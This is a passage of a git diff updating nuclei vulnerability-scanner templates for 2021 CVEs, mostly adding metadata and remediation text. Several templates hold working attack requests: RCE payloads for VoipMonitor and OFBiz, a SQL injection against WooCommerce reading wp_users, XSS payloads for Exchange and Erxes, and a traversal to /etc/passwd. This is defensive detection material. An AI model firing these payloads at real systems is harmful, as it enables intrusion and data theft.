seo/seopanel/login.php?sec=forgot email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor. + reference: + - http://www.cinquino.eu/SeoPanelReflect.htm + - https://github.com/seopanel/Seo-Panel/issues/202 + - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-3002 cwe-id: CWE-79 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-3002 - - http://www.cinquino.eu/SeoPanelReflect.htm - tags: cve,cve2021,seopanel,xss + epss-score: 0.00143 + epss-percentile: 0.49273 + cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: "seopanel" + product: seo_panel + tags: cve2021,cve,seopanel,xss -requests: +http: - raw: - | POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 @@ -26,10 +40,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: @@ -40,4 +50,9 @@ requests: words: - "" - "seopanel" - condition: and \ No newline at end of file + condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-30049.yaml b/nuclei-templates/CVE-2021/CVE-2021-30049.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-30049.yaml rename to nuclei-templates/CVE-2021/CVE-2021-30049.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-30128.yaml b/nuclei-templates/CVE-2021/CVE-2021-30128.yaml index c439f7e542..0b586a7349 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30128.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30128.yaml @@ -4,23 +4,34 @@ info: name: Apache OFBiz <17.12.07 - Arbitrary Code Execution author: For3stCo1d severity: critical - description: Apache OFBiz has unsafe deserialization prior to 17.12.07 version + description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability. reference: - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E - - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E + - https://nvd.nist.gov/vuln/detail/CVE-2021-30128 + - http://www.openwall.com/lists/oss-security/2021/04/27/5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 + epss-score: 0.62199 + epss-percentile: 0.97748 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: apache + product: ofbiz fofa-query: app="Apache_OFBiz" - verified: "true" - tags: cve,cve2021,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce -requests: +http: - raw: - | POST /webtools/control/SOAPService HTTP/1.1 @@ -56,3 +67,4 @@ requests: part: body words: - 'value="errorMessage"' +# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30134.yaml b/nuclei-templates/CVE-2021/CVE-2021-30134.yaml index bc7cce8ad4..73e42c7040 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30134.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30134.yaml @@ -1,22 +1,35 @@ id: CVE-2021-30134 info: - name: php-mod/curl Library - Cross-Site Scripting + name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting author: theamanrawat severity: medium description: | - php-mod/curl (a wrapper of the PHP cURL extension) before 2.3.2 allows XSS via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. + Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7 - https://nvd.nist.gov/vuln/detail/CVE-2021-30134 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-30134 + cwe-id: CWE-79 + epss-score: 0.00097 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: php_curl_class_project + product: php_curl_class google-query: inurl:"/php-curl-test/post_file_path_upload.php" - tags: cve,cve2021,xss,php-mod,wpscan + tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project -requests: +http: - method: GET path: - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=" @@ -35,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30175.yaml b/nuclei-templates/CVE-2021/CVE-2021-30175.yaml index 3a49bcea20..245a4f438a 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30175.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30175.yaml @@ -6,25 +6,28 @@ info: severity: critical description: | ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0. reference: - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md - https://nvd.nist.gov/vuln/detail/CVE-2021-30175 - https://pro.zerof.ru + - https://github.com/awillix/research classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-30175 cwe-id: CWE-89 - epss-score: 0.04078 - epss-percentile: 0.91175 + epss-score: 0.05126 + epss-percentile: 0.92775 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zerof product: web_server - tags: cve,cve2021,zerof,sqli + tags: cve2021,cve,zerof,sqli http: - raw: @@ -50,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041f7125bafe6fafc1677026792507a6e58c960e2a0724b15a012c482ef708317022100d2a95b9afbea8f99ba1a014562233d695f84cd0bfc30652853e0cce4a0befc53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml index 3e99ae09d3..4f33512058 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml @@ -1,5 +1,4 @@ id: CVE-2021-30461 - info: name: VoipMonitor Pre-Auth-RCE author: nithissh @@ -7,7 +6,6 @@ info: description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - requests: - raw: - | @@ -21,7 +19,6 @@ requests: Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and matchers: - type: word @@ -32,7 +29,6 @@ requests: - "VoIPmonitor installation" part: body condition: and - - type: status status: - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-3110.yaml b/nuclei-templates/CVE-2021/CVE-2021-3110.yaml index 62e21ef882..ca1e66df46 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-3110.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-3110.yaml @@ -6,19 +6,32 @@ info: severity: critical description: | PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of PrestaShop. reference: - https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e - https://www.exploit-db.com/exploits/49410 - https://nvd.nist.gov/vuln/detail/CVE-2021-3110 + - https://medium.com/%40gondaliyajaimin797/cve-2021-3110-75a24943ca5e + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3110 cwe-id: CWE-89 + epss-score: 0.83896 + epss-percentile: 0.98387 + cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2021,sqli,prestshop,edb -requests: + verified: true + max-request: 1 + vendor: prestashop + product: prestashop + tags: cve,cve2021,sqli,prestshop,edb,prestashop + +http: - raw: - | @timeout: 20s @@ -33,5 +46,4 @@ requests: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# Enhanced by md on 2022/12/08 +# digest: 4a0a0047304502200c34a850d39fbeeddbc540d1d52ba9d67b8a5204578f8e85b7f4eb94e0afb1830221009b0894c1fc99cb6734f92c3f89d62c547c7a350f7e0f4c6b5edacd23e5a8ae19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-31195.yaml b/nuclei-templates/CVE-2021/CVE-2021-31195.yaml index e5d445da7f..6c895b086f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-31195.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-31195.yaml @@ -3,23 +3,34 @@ id: CVE-2021-31195 info: name: Microsoft Exchange Server - Cross-Site Scripting author: infosecsanyam - severity: high + severity: medium description: Microsoft Exchange Server, or OWA, is vulnerable to a cross-site scripting vulnerability in refurl parameter of frowny.asp. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the user's browser, potentially leading to session hijacking, data theft, or other malicious activities. + remediation: | + Apply the latest security updates provided by Microsoft to mitigate this vulnerability. reference: - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195 - https://nvd.nist.gov/vuln/detail/CVE-2021-31195 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31195 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 + epss-score: 0.92095 + epss-percentile: 0.98883 + cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: + max-request: 1 + vendor: microsoft + product: exchange_server shodan-query: http.title:"Outlook" - tags: microsoft,exchange,owa,xss + tags: cve2021,cve,microsoft,exchange,owa,xss -requests: +http: - method: GET path: - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//' @@ -32,13 +43,12 @@ requests: - 'mail/bootr.ashx' condition: and - - type: status - status: - - 500 - - type: word + part: header words: - "text/html" - part: header -# Enhanced by cs 09/23/2022 + - type: status + status: + - 500 +# digest: 4a0a00473045022100add3f33b9d2e9d57977208908f642566e5d796379120daba28b5ee7685d38b7702204fc9e494046fce48f88b428f7fc426ddca6906f03364c55c0ca03adc357c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-31755.yaml b/nuclei-templates/CVE-2021/CVE-2021-31755.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-31755.yaml rename to nuclei-templates/CVE-2021/CVE-2021-31755.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-31800.yaml b/nuclei-templates/CVE-2021/CVE-2021-31800.yaml deleted file mode 100644 index 39813aec4d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-31800.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: CVE-2021-31800 -info: - name: impacket directory traversal - author: geeknik - description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key. - reference: https://github.com/SecureAuthCorp/impacket/commit/49c643bf66620646884ed141c94e5fdd85bcdd2f - severity: high - tags: impacket,cve,cve2021,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml index 2394432a9e..8b70dbaa8d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml @@ -1,5 +1,4 @@ id: CVE-2021-31805 - info: name: Apache Struts2 S2-062 - Remote Code Execution author: taielab @@ -16,7 +15,6 @@ info: cve-id: CVE-2021-31805 cwe-id: CWE-917 tags: cve,cve2021,apache,rce,struts,struts2 - requests: - raw: - | @@ -41,7 +39,6 @@ requests: } ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— - matchers: - type: regex part: body diff --git a/nuclei-templates/CVE-2021/cve-2021-32618.yaml b/nuclei-templates/CVE-2021/CVE-2021-32618.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32618.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32618.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-32682.yaml b/nuclei-templates/CVE-2021/CVE-2021-32682.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-32682.yaml rename to nuclei-templates/CVE-2021/CVE-2021-32682.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-32789.yaml b/nuclei-templates/CVE-2021/CVE-2021-32789.yaml index 0ca835d4dd..c81574a4a4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-32789.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-32789.yaml @@ -6,6 +6,10 @@ info: severity: high description: | woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. + remediation: | + Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability. reference: - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx @@ -17,9 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2021-32789 cwe-id: CWE-89 - tags: cve,cve2021,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan + epss-score: 0.09336 + epss-percentile: 0.94559 + cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: automattic + product: woocommerce_blocks + framework: wordpress + tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic -requests: +http: - method: GET path: - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' @@ -42,5 +54,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 +# digest: 4a0a00473045022100b54f8925ab16f82ba44c482f52bbf32655fb597eb5e2db8ad27f277ea244319802200a1c5a6db552aab8186869b0a59c19879ec2a61824d28b7674831cdeca90ecaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-32853.yaml b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml index 66208ed18d..5c5fd48f84 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-32853.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml @@ -1,20 +1,35 @@ id: CVE-2021-32853 info: - name: Erxes <= v0.23.0 XSS + name: Erxes <0.23.0 - Cross-Site Scripting author: dwisiswant0 - severity: medium - description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag. + severity: critical + description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 - metadata: - shodan-query: http.title:"erxes" + - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14 + - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 cve-id: CVE-2021-32853 - tags: cve,cve2021,xss,erxes,oss + cwe-id: CWE-79 + epss-score: 0.01224 + epss-percentile: 0.83856 + cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: erxes + product: erxes + shodan-query: http.title:"erxes" + tags: cve2021,cve,xss,erxes,oss -requests: +http: - method: GET path: - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -36,3 +51,4 @@ requests: - type: status status: - 200 +# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-3297.yaml b/nuclei-templates/CVE-2021/CVE-2021-3297.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3297.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3297.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/CVE-2021-33044.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33044.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33044.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-33357.yaml b/nuclei-templates/CVE-2021/CVE-2021-33357.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-33357.yaml rename to nuclei-templates/CVE-2021/CVE-2021-33357.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33690.yaml b/nuclei-templates/CVE-2021/CVE-2021-33690.yaml index 292022e8fb..ab06b3d302 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-33690.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-33690.yaml @@ -12,13 +12,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-33690 - https://launchpad.support.sap.com/#/notes/3072955 - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806 + - https://github.com/redrays-io/CVE-2021-33690 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-33690 cwe-id: CWE-918 - epss-score: 0.37614 - epss-percentile: 0.96834 + epss-score: 0.3856 + epss-percentile: 0.97133 cpe: cpe:2.3:a:sap:netweaver_development_infrastructure:7.11:*:*:*:*:*:*:* metadata: verified: true @@ -26,7 +27,7 @@ info: vendor: sap product: netweaver_development_infrastructure shodan-query: html:"SAP NetWeaver" - tags: cve,cve2021,oast,ssrf,sap + tags: cve2021,cve,oast,ssrf,sap http: - raw: @@ -48,5 +49,4 @@ http: part: body words: - "Could not connect to the CBS" - -# digest: 4b0a004830460221008fc4945456a666c784af703474f476468e99fa0d875a4ae8dca7616c4a32274e022100f054941861c0c47bbfaf03d49a3e10862981678a60f637df117abb5e34d58028:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022027727d913e7044670a5cfc2a318a45aac111b189bee52347b9a90933cf5c801b022011d1873dee71de17c4f6b36800ac5b17f4129ced9b5bba0e86ef087c08c08dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-3377.yaml b/nuclei-templates/CVE-2021/CVE-2021-3377.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-3377.yaml rename to nuclei-templates/CVE-2021/CVE-2021-3377.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-33851.yaml b/nuclei-templates/CVE-2021/CVE-2021-33851.yaml index 8022781c06..eae0b6e411 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-33851.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-33851.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser. + remediation: | + Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203 - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html - https://wordpress.org/plugins/customize-login-image/ - https://nvd.nist.gov/vuln/detail/cve-2021-33851 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-33851 cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.2831 + cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss + verified: true + max-request: 4 + vendor: apasionados + product: customize_login_image + framework: wordpress + tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,39 +40,33 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=&cli_logo_file=&cli_login_background_color=&cli_custom_css= - - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - 'status_code_4 == 200' - - 'contains(all_headers_4, "text/html")' + - 'contains(header_4, "text/html")' - 'contains(body_4, "Go to ")' condition: and extractors: - type: regex name: nonce - part: body group: 1 regex: - 'name="_wpnonce" value="([0-9a-zA-Z]+)"' internal: true - -# Enhanced by md on 2022/12/08 + part: body +# digest: 490a004630440220098b618e64216cc6e575a474182053eae704f5b3d91f98e7851d52a79480d57002207755a534f0e8813a54b102ebe3fb5b8a4f145c17ff32468ab7f25305f3536832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34640.yaml b/nuclei-templates/CVE-2021/CVE-2021-34640.yaml new file mode 100644 index 0000000000..7dd6ecef37 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-34640.yaml @@ -0,0 +1,61 @@ +id: CVE-2021-34640 + +info: + name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640 + - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34640 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-34640 + cwe-id: CWE-79 + epss-score: 0.00116 + epss-percentile: 0.45185 + cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: securimage-wp-fixed_project + product: securimage-wp-fixed + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET //wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml index 53d1f872e4..8dfd2c16cb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-34643.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-34643.yaml @@ -1,21 +1,36 @@ id: CVE-2021-34643 info: - name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting + name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting author: 